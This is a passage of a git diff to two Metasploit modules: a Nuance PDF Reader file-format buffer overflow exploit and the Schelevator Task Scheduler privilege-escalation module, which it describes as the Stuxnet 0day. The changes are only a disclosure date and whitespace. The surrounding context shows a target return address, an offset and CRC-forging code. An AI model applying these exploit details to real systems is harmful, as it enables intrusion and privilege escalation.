+++ b/modules/exploits/windows/fileformat/nuance_pdf_launch_overflow.rb
@@ -47,6 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
[
[ 'Nuance PDF Reader v6.x (XP SP3)', { 'Ret' => 0x10191579, 'Offset' => 1290 } ] #ppr - pluscore.dll
],
+ 'DisclosureDate' => 'Oct 08 2010',
'DefaultTarget' => 0))
register_options(
diff --git a/modules/post/windows/escalate/schelevator.rb b/modules/post/windows/escalate/schelevator.rb
index 7698d55050..df596d419b 100644
--- a/modules/post/windows/escalate/schelevator.rb
+++ b/modules/post/windows/escalate/schelevator.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Post
def initialize(info={})
super( update_info( info,
'Name' => 'Schelevator',
- 'Description' => %q{
+ 'Description' => %q{
This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet.
NOTE: Thanks to webDEViL for the information about disable/enable.
},
@@ -324,7 +324,7 @@ class Metasploit3 < Msf::Post
crc = crc32(data[0, data.length - 12])
data[-12, 4] = [crc].pack('V')
-
+
data[-12, 12].unpack('C*').reverse.each { |b|
old_crc = ((old_crc << 8) ^ bwd_table[old_crc >> 24] ^ b) & 0xffffffff
}